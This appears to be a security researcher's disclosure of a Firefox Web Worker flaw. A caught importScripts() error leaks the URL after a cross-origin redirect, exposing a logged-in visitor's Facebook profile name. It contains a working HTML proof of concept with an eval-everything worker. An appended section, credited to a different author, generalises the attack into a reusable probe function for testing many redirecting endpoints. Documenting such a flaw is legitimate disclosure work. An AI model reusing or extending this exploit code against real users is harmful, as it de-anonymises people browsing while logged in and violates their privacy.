Whilst investigating the Worker implementation in Firefox, I noticed that some information leak is happening. Basically, if you go to a URL like http://www.facebook.com/me (assuming you're logged in), you will get redirected to your own Facebook page, which usually contains your name in the URL itself.
And in the worker we basically did a try-catch, and then I noticed the error object passed had a bit more information than what I noticed in a normal context: I was able to get the URL after redirection, when it's supposed to only show the initial URL.
<!DOCTYPE html>
<html>
<head>
<title>SOP bypass using workers - Sensitive data retrieval PoC - Abdulrahman Alqabandi</title>
<script type="application/javascript">
window.onload=()=>{
  //Our worker. onerror=>log(error) && onmsg=>eval(msg)
  //Everything the page posts to the worker is eval()ed inside the worker's global scope.
  var workerText='onerror=function(q){console.log("err"+q);};onmessage=function(q){console.log("Will eval:"+q.data);eval(q.data)};';
  //Create our worker with some blob: url.
  var qWorker=new Worker(URL.createObjectURL(new Blob([workerText])));
  //Alert any data received by our new worker
  qWorker.onmessage=(q)=>{alert(q.data);};
  document.getElementById('qab').onmousedown=()=>{
    //This is the vulnerable part.
    //The importScripts() function does not check cross-origins and will try to execute any data returned by the xorigin url.
    //The HTML returned by facebook is not valid JavaScript, so importScripts() throws.
    //However, if we catch that error, the URL is exposed in the error object (after redirection),
    //and the worker posts it back to the page.
    qWorker.postMessage("try{importScripts('https://m.facebook.com/me')}catch(e){this.postMessage(e.fileName)}");
  };
};
</script>
</head>
<body>
<input type="button" value="Get my facebook name!" id="qab">
</body>
</html>
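The PoC above hard-codes one target URL and alerts whatever comes back. As an added example (my code, not part of the original PoC), the following generalises the same technique: it builds the probe string the worker eval()s for any target URL, wires the worker round-trip up as a Promise, and compares the requested URL with the fileName reported in the caught error so the caller can see exactly what the redirect revealed. It assumes the behaviour the post describes, namely that a failed importScripts() throws an error whose fileName is the post-redirect URL; the function names (buildProbe, probeViaWorker, analyseLeak) and the sample profile path are my own and constructed for illustration.

```javascript
// Added example, not the original PoC. Assumes the Firefox behaviour described
// in the post: a failed cross-origin importScripts() throws an error whose
// fileName holds the URL *after* redirection.

// Build the snippet the page's worker eval()s. The target is JSON-encoded so a
// URL containing quotes or backslashes cannot break out of the string literal.
function buildProbe(targetUrl) {
  const target = JSON.stringify(String(new URL(targetUrl)));
  return "try{importScripts(" + target + ")}catch(e){this.postMessage(e.fileName)}";
}

// Browser-only helper (hypothetical name): post the probe to an already created
// worker of the kind shown in the PoC and resolve with the fileName it sends back.
// Not exercised outside a browser; Node has no Worker global.
function probeViaWorker(worker, targetUrl, timeoutMs = 5000) {
  return new Promise((resolve, reject) => {
    const timer = setTimeout(() => reject(new Error("no reply from worker")), timeoutMs);
    worker.onmessage = (ev) => { clearTimeout(timer); resolve(String(ev.data)); };
    worker.onerror = (ev) => { clearTimeout(timer); reject(ev); };
    worker.postMessage(buildProbe(targetUrl));
  });
}

// Compare the requested URL with the fileName reported in the caught error.
// Returns null when the error only echoes the requested URL (nothing leaked),
// otherwise the final URL, whether the redirect crossed origins, and the path
// that the redirect exposed (the profile name, in the facebook.com/me case).
function analyseLeak(requestedUrl, reportedFileName) {
  const requested = new URL(requestedUrl);
  // Resolve relative to the request in case the browser reports a relative fileName.
  const reported = new URL(reportedFileName, requested);
  if (reported.href === requested.href) return null;
  return {
    finalUrl: reported.href,
    crossOrigin: reported.origin !== requested.origin,
    revealedPath: reported.pathname,
  };
}

// Constructed sample input: the PoC's target and the kind of post-redirect URL
// the post describes. The profile name is made up for this example.
const SAMPLE_REQUEST = "https://m.facebook.com/me";
const SAMPLE_REPORTED = "https://m.facebook.com/some.profile.name";

// Stand-alone run: show the probe string and the analysed leak for the sample.
console.log(buildProbe(SAMPLE_REQUEST));
console.log(analyseLeak(SAMPLE_REQUEST, SAMPLE_REPORTED));
```

In a page with the PoC's worker in scope, `probeViaWorker(qWorker, "https://m.facebook.com/me").then((f) => analyseLeak("https://m.facebook.com/me", f))` reproduces the button handler, but returns structured data instead of an alert, which is what you want when probing several redirecting endpoints in one test run.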